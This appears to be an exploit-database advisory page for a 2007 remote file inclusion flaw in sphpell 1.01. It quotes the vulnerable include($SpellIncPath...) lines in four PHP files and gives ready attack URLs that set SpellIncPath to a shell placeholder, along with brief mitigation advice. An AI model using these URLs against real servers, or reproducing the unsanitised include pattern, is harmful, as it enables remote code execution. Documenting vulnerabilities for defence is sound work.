sphpell - 1.01 Remote File Include

vendor:

sphpell

by:

Bulan: Cyber-security // Cyber-security.org

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: sphpell

Affected Version From: 01.01

Affected Version To: 01.01

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

sphpell – 1.01 Remote File Include

The sphpell 1.01 script is vulnerable to remote file inclusion. The vulnerability exists in the spellcheckpageinc.php, spellchecktext.php, spellcheckwindow.php, and spellcheckwindowframeset.php files. An attacker can include arbitrary remote files by manipulating the SpellIncPath parameter in the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the sphpell script. Additionally, proper input validation and sanitization should be implemented to prevent remote file inclusion attacks.

Source

Exploit-DB raw data:

sphpell - 1.01 Remote File Include
---------------------------------------------------------------------------------
Bulan: Cyber-security // Cyber-security.org
---------------------------------------------------------------------------------
script download:http://sourceforge.net/project/showfiles.php?group_id=82330

---------------------------------------------------------------------------------
ERROR [1];spellcheckpageinc.php?

              include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/checkpageinc.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [2];spellchecktext.php?

                   include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellchecktext.php? SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [3];spellcheckwindow.php?

                        include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellcheckwindow.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [4];spellcheckwindowframeset.php?

                     include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellcheckwindowframeset.php?SpellIncPath=5h3LL

---------------------------------------------------------------------------------
d0rk: :(

# milw0rm.com [2007-06-30]